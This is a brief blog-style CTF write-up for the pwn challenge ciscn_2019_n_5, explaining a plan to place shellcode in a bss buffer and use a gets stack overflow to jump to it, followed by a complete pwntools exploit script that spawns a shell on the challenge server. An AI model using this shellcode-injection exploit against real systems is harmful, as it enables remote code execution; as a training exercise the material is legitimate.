shellcode
程序员文章站
2024-02-12 11:10:58
...
ciscn_2019_n_5
思路:read读取输入到bss段上的name中去,可以让程序读取shellcode,再利用后面的gets栈溢出getshell
main:
exp:
from pwn import *
from LibcSearcher import *
context.arch = 'amd64'
p = remote('node3.buuoj.cn',26505)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
payload='a'*(0x20+8) + p64(0x0000000000601080)
p.sendline(payload)
p.interactive()